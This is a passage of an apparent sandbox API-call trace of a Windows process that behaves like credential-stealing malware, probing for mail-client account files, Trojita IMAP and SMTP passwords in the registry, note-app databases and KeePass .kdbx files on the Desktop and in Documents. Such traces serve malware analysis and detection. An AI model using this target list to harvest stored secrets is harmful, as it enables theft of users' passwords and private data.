Flags=0x0, Size=0x6a) returned 0x6bb0a8 [0130.136] GetProcessHeap () returned 0x6a0000 [0130.136] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc960 | out: hHeap=0x6a0000) returned 1 [0130.137] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0130.137] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail2\\Accounts.xml") returned 0 [0130.138] GetProcessHeap () returned 0x6a0000 [0130.138] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb0a8 | out: hHeap=0x6a0000) returned 1 [0130.138] GetProcessHeap () returned 0x6a0000 [0130.138] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bae98 | out: hHeap=0x6a0000) returned 1 [0130.138] GetProcessHeap () returned 0x6a0000 [0130.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bae98 [0130.139] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0130.140] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x6bae98 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0130.140] GetProcessHeap () returned 0x6a0000 [0130.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f64) returned 0x6bc960 [0130.141] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0130.142] wvsprintfW (in: param_1=0x6bc960, param_2="%s\\yMail\\ymail.ini", arglist=0x19fac4 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail\\ymail.ini") returned 47 [0130.142] GetProcessHeap () returned 0x6a0000 [0130.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x62) returned 0x6bb0a8 [0130.142] GetProcessHeap () returned 0x6a0000 [0130.143] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc960 | out: hHeap=0x6a0000) returned 1 [0130.144] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0130.144] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail\\ymail.ini") returned 0 [0130.144] GetProcessHeap () returned 0x6a0000 [0130.145] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb0a8 | out: hHeap=0x6a0000) returned 1 [0130.145] GetProcessHeap () returned 0x6a0000 [0130.145] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bae98 | out: hHeap=0x6a0000) returned 1 [0130.145] GetProcessHeap () returned 0x6a0000 [0130.145] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e8) returned 0x6bb458 [0130.145] GetProcessHeap () returned 0x6a0000 [0130.146] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6ab4f0 [0130.146] GetProcessHeap () returned 0x6a0000 [0130.146] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bb848 [0130.146] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0130.146] SHGetValueW (in: hkey=0x80000001, pszSubKey="SOFTWARE\\flaska.net\\trojita", pszValue="imap.auth.pass", pdwType=0x0, pvData=0x6bb848, pcbData=0x19fa1c*=0x104 | out: pdwType=0x0, pvData=0x6bb848, pcbData=0x19fa1c*=0x104) returned 0x2 [0130.147] GetProcessHeap () returned 0x6a0000 [0130.147] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb848 | out: hHeap=0x6a0000) returned 1 [0130.147] GetProcessHeap () returned 0x6a0000 [0130.147] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bb848 [0130.152] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0130.152] SHGetValueW (in: hkey=0x80000001, pszSubKey="SOFTWARE\\flaska.net\\trojita", pszValue="msa.smtp.auth.pass", pdwType=0x0, pvData=0x6bb848, pcbData=0x19fa1c*=0x104 | out: pdwType=0x0, pvData=0x6bb848, pcbData=0x19fa1c*=0x104) returned 0x2 [0130.154] GetProcessHeap () returned 0x6a0000 [0130.154] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb848 | out: hHeap=0x6a0000) returned 1 [0130.154] GetProcessHeap () returned 0x6a0000 [0130.155] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0130.155] GetProcessHeap () returned 0x6a0000 [0130.155] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ab4f0 | out: hHeap=0x6a0000) returned 1 [0130.155] GetProcessHeap () returned 0x6a0000 [0130.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f8c) returned 0x6bc960 [0130.156] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0130.157] wvsprintfW (in: param_1=0x6bc960, param_2="%s\\TrulyMail\\Data\\Settings\\user.config", arglist=0x19fb40 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\TrulyMail\\Data\\Settings\\user.config") returned 73 [0130.157] GetProcessHeap () returned 0x6a0000 [0130.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x96) returned 0x6bac30 [0130.157] GetProcessHeap () returned 0x6a0000 [0130.158] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc960 | out: hHeap=0x6a0000) returned 1 [0130.159] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0130.159] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\TrulyMail\\Data\\Settings\\user.config") returned 0 [0130.159] GetProcessHeap () returned 0x6a0000 [0130.159] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0130.160] GetProcessHeap () returned 0x6a0000 [0130.160] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x12c) returned 0x6bac30 [0130.160] GetProcessHeap () returned 0x6a0000 [0130.160] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6ab4f0 [0130.160] GetProcessHeap () returned 0x6a0000 [0130.160] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bae98 [0130.161] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0130.161] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x6bae98 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0130.162] Sleep (dwMilliseconds=0xa) [0130.183] GetProcessHeap () returned 0x6a0000 [0130.183] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f4a) returned 0x6bc960 [0130.183] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0130.184] wvsprintfW (in: param_1=0x6bc960, param_2="%s\\%s", arglist=0x19f8fc | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.spn") returned 37 [0130.187] GetProcessHeap () returned 0x6a0000 [0130.187] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4e) returned 0x6bb0a8 [0130.187] GetProcessHeap () returned 0x6a0000 [0130.188] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc960 | out: hHeap=0x6a0000) returned 1 [0130.188] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.spn" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\*.spn"), lpFindFileData=0x19f910 | out: lpFindFileData=0x19f910*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x207d0, ftCreationTime.dwHighDateTime=0x20000, ftLastAccessTime.dwLowDateTime=0x48, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x6a78a0, ftLastWriteTime.dwHighDateTime=0x6a78a0, nFileSizeHigh=0x6b4588, nFileSizeLow=0x6b4ab8, dwReserved0=0x0, dwReserved1=0x19f96c, cFileName="ը瞆", cAlternateFileName="뒭蕬͈읩﮽⬤ﭴ\x19䂑@")) returned 0xffffffff [0130.189] GetProcessHeap () returned 0x6a0000 [0130.189] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb0a8 | out: hHeap=0x6a0000) returned 1 [0130.189] GetProcessHeap () returned 0x6a0000 [0130.190] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bae98 | out: hHeap=0x6a0000) returned 1 [0130.190] GetProcessHeap () returned 0x6a0000 [0130.190] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bae98 [0130.191] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0130.191] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x6bae98 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x0 [0130.192] Sleep (dwMilliseconds=0xa) [0130.212] GetProcessHeap () returned 0x6a0000 [0130.212] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f4a) returned 0x6bc960 [0130.212] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0130.213] wvsprintfW (in: param_1=0x6bc960, param_2="%s\\%s", arglist=0x19f8e4 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.spn") returned 35 [0130.213] GetProcessHeap () returned 0x6a0000 [0130.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4a) returned 0x6bb0a8 [0130.213] GetProcessHeap () returned 0x6a0000 [0130.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc960 | out: hHeap=0x6a0000) returned 1 [0130.217] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.spn" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\*.spn"), lpFindFileData=0x19f8f8 | out: lpFindFileData=0x19f8f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x207d0, ftCreationTime.dwHighDateTime=0x20000, ftLastAccessTime.dwLowDateTime=0x48, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x6a78a0, ftLastWriteTime.dwHighDateTime=0x6a78a0, nFileSizeHigh=0x6b4588, nFileSizeLow=0x6b4b00, dwReserved0=0x0, dwReserved1=0x19f954, cFileName="ը瞆", cAlternateFileName="⦰螚䇆ﮥ⬤ﭜ\x19䂑@")) returned 0xffffffff [0130.217] GetProcessHeap () returned 0x6a0000 [0130.217] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb0a8 | out: hHeap=0x6a0000) returned 1 [0130.217] GetProcessHeap () returned 0x6a0000 [0130.218] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bae98 | out: hHeap=0x6a0000) returned 1 [0130.218] GetProcessHeap () returned 0x6a0000 [0130.218] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0130.218] GetProcessHeap () returned 0x6a0000 [0130.218] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ab4f0 | out: hHeap=0x6a0000) returned 1 [0130.218] GetProcessHeap () returned 0x6a0000 [0130.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f74) returned 0x6bc960 [0130.219] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0130.220] wvsprintfW (in: param_1=0x6bc960, param_2="%s\\To-Do DeskList\\tasks.db", arglist=0x19fb5c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\To-Do DeskList\\tasks.db") returned 61 [0130.220] GetProcessHeap () returned 0x6a0000 [0130.220] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7e) returned 0x6bac30 [0130.220] GetProcessHeap () returned 0x6a0000 [0130.220] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc960 | out: hHeap=0x6a0000) returned 1 [0130.222] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0130.222] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\To-Do DeskList\\tasks.db") returned 0 [0130.223] GetProcessHeap () returned 0x6a0000 [0130.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0130.223] GetProcessHeap () returned 0x6a0000 [0130.223] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x12c) returned 0x6bac30 [0130.223] GetProcessHeap () returned 0x6a0000 [0130.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6ab4f0 [0130.224] GetProcessHeap () returned 0x6a0000 [0130.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bae98 [0130.225] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0130.226] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x6bae98 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0130.226] GetProcessHeap () returned 0x6a0000 [0130.226] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f64) returned 0x6bc960 [0130.227] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0130.229] wvsprintfW (in: param_1=0x6bc960, param_2="%s\\stickies\\images", arglist=0x19fb24 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\stickies\\images") returned 53 [0130.229] GetProcessHeap () returned 0x6a0000 [0130.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x6e) returned 0x6bb0a8 [0130.229] GetProcessHeap () returned 0x6a0000 [0130.230] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc960 | out: hHeap=0x6a0000) returned 1 [0130.230] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0130.231] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\stickies\\images") returned 0 [0130.231] GetProcessHeap () returned 0x6a0000 [0130.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bae98 | out: hHeap=0x6a0000) returned 1 [0130.231] GetProcessHeap () returned 0x6a0000 [0130.232] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb0a8 | out: hHeap=0x6a0000) returned 1 [0130.232] GetProcessHeap () returned 0x6a0000 [0130.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bae98 [0130.233] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0130.233] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x6bae98 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0130.233] GetProcessHeap () returned 0x6a0000 [0130.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f5e) returned 0x6bc960 [0130.234] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0130.236] wvsprintfW (in: param_1=0x6bc960, param_2="%s\\stickies\\rtf", arglist=0x19fb0c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\stickies\\rtf") returned 50 [0130.236] GetProcessHeap () returned 0x6a0000 [0130.236] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x68) returned 0x6bb0a8 [0130.236] GetProcessHeap () returned 0x6a0000 [0130.237] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc960 | out: hHeap=0x6a0000) returned 1 [0130.238] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0130.239] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\stickies\\rtf") returned 0 [0130.239] GetProcessHeap () returned 0x6a0000 [0130.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bae98 | out: hHeap=0x6a0000) returned 1 [0130.240] GetProcessHeap () returned 0x6a0000 [0130.240] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb0a8 | out: hHeap=0x6a0000) returned 1 [0130.240] GetProcessHeap () returned 0x6a0000 [0130.240] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0130.240] GetProcessHeap () returned 0x6a0000 [0130.241] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ab4f0 | out: hHeap=0x6a0000) returned 1 [0130.241] GetProcessHeap () returned 0x6a0000 [0130.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x12c) returned 0x6bac30 [0130.241] GetProcessHeap () returned 0x6a0000 [0130.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6ab4f0 [0130.241] GetProcessHeap () returned 0x6a0000 [0130.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bae98 [0130.242] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0130.243] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x6bae98 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0130.243] GetProcessHeap () returned 0x6a0000 [0130.243] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f60) returned 0x6bc960 [0130.244] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0130.245] wvsprintfW (in: param_1=0x6bc960, param_2="%s\\NoteFly\\notes", arglist=0x19fb54 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NoteFly\\notes") returned 51 [0130.245] GetProcessHeap () returned 0x6a0000 [0130.245] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x6a) returned 0x6bb0a8 [0130.245] GetProcessHeap () returned 0x6a0000 [0130.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc960 | out: hHeap=0x6a0000) returned 1 [0130.253] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0130.253] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NoteFly\\notes") returned 0 [0130.253] GetProcessHeap () returned 0x6a0000 [0130.254] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bae98 | out: hHeap=0x6a0000) returned 1 [0130.254] GetProcessHeap () returned 0x6a0000 [0130.254] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb0a8 | out: hHeap=0x6a0000) returned 1 [0130.254] GetProcessHeap () returned 0x6a0000 [0130.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0130.255] GetProcessHeap () returned 0x6a0000 [0130.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ab4f0 | out: hHeap=0x6a0000) returned 1 [0130.255] GetProcessHeap () returned 0x6a0000 [0130.255] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f86) returned 0x6bc960 [0130.255] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0130.256] wvsprintfW (in: param_1=0x6bc960, param_2="%s\\Conceptworld\\Notezilla\\Notes8.db", arglist=0x19fb48 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Conceptworld\\Notezilla\\Notes8.db") returned 70 [0130.256] GetProcessHeap () returned 0x6a0000 [0130.256] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x6bac30 [0130.256] GetProcessHeap () returned 0x6a0000 [0130.257] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc960 | out: hHeap=0x6a0000) returned 1 [0130.257] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0130.258] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Conceptworld\\Notezilla\\Notes8.db") returned 0 [0130.258] GetProcessHeap () returned 0x6a0000 [0130.258] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0130.259] GetProcessHeap () returned 0x6a0000 [0130.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f92) returned 0x6bc960 [0130.259] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0130.260] wvsprintfW (in: param_1=0x6bc960, param_2="%s\\Microsoft\\Sticky Notes\\StickyNotes.snt", arglist=0x19fb3c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Sticky Notes\\StickyNotes.snt") returned 76 [0130.260] GetProcessHeap () returned 0x6a0000 [0130.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9c) returned 0x6aaa48 [0130.260] GetProcessHeap () returned 0x6a0000 [0130.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc960 | out: hHeap=0x6a0000) returned 1 [0130.262] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0130.262] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Sticky Notes\\StickyNotes.snt") returned 0 [0130.262] GetProcessHeap () returned 0x6a0000 [0130.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6aaa48 | out: hHeap=0x6a0000) returned 1 [0130.263] GetProcessHeap () returned 0x6a0000 [0130.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bae98 [0130.263] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0130.264] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x6bae98 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0130.264] GetProcessHeap () returned 0x6a0000 [0130.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f44) returned 0x6bc960 [0130.264] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0130.265] wvsprintfW (in: param_1=0x6bc960, param_2="%s", arglist=0x19fb60 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 31 [0130.265] GetProcessHeap () returned 0x6a0000 [0130.265] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x42) returned 0x6b56a0 [0130.265] GetProcessHeap () returned 0x6a0000 [0130.266] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc960 | out: hHeap=0x6a0000) returned 1 [0130.266] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0130.266] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 1 [0130.267] GetProcessHeap () returned 0x6a0000 [0130.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bae98 | out: hHeap=0x6a0000) returned 1 [0130.269] Sleep (dwMilliseconds=0xa) [0130.311] GetProcessHeap () returned 0x6a0000 [0130.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f4a) returned 0x6bc960 [0130.312] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0130.313] wvsprintfW (in: param_1=0x6bc960, param_2="%s\\%s", arglist=0x19f8e0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.kdbx") returned 38 [0130.313] GetProcessHeap () returned 0x6a0000 [0130.313] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x6bac30 [0130.313] GetProcessHeap () returned 0x6a0000 [0130.313] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc960 | out: hHeap=0x6a0000) returned 1 [0130.313] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.kdbx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\*.kdbx"), lpFindFileData=0x19f8f4 | out: lpFindFileData=0x19f8f4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="嚠k꺘k")) returned 0xffffffff [0130.314] GetProcessHeap () returned 0x6a0000 [0130.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0130.314] GetProcessHeap () returned 0x6a0000 [0130.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b56a0 | out: hHeap=0x6a0000) returned 1 [0130.314] GetProcessHeap () returned 0x6a0000 [0130.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bae98 [0130.315] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0130.315] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x6bae98 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x0 [0130.316] GetProcessHeap () returned 0x6a0000 [0130.316] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f44) returned 0x6bc960 [0130.316] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0130.317] wvsprintfW (in: param_1=0x6bc960, param_2="%s", arglist=0x19fb48 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 29 [0130.317] GetProcessHeap () returned 0x6a0000 [0130.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4718 [0130.317] GetProcessHeap () returned 0x6a0000 [0130.317] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc960 | out: hHeap=0x6a0000) returned 1 [0130.318] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0130.318] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0130.318] GetProcessHeap () returned 0x6a0000 [0130.319] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bae98 | out: hHeap=0x6a0000) returned 1 [0130.320] Sleep (dwMilliseconds=0xa) [0130.331] GetProcessHeap () returned 0x6a0000 [0130.331] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f4a) returned 0x6bc960 [0130.332] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0130.333] wvsprintfW (in: param_1=0x6bc960, param_2="%s\\%s", arglist=0x19f8c8 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.kdbx") returned 36 [0130.333] GetProcessHeap () returned 0x6a0000 [0130.333] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x6bac30 [0130.333] GetProcessHeap () returned 0x6a0000 [0130.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc960 | out: hHeap=0x6a0000) returned 1 [0130.334] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.kdbx" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\*.kdbx"), lpFindFileData=0x19f8dc | out: lpFindFileData=0x19f8dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="䜘k꺘k")) returned 0xffffffff [0130.335] GetProcessHeap () returned 0x6a0000 [0130.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0130.335] GetProcessHeap () returned 0x6a0000 [0130.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4718 | out: hHeap=0x6a0000) returned 1 [0130.336] GetProcessHeap () returned 0x6a0000 [0130.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bae98 [0130.336] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0130.337] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x6bae98 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0130.337] GetProcessHeap 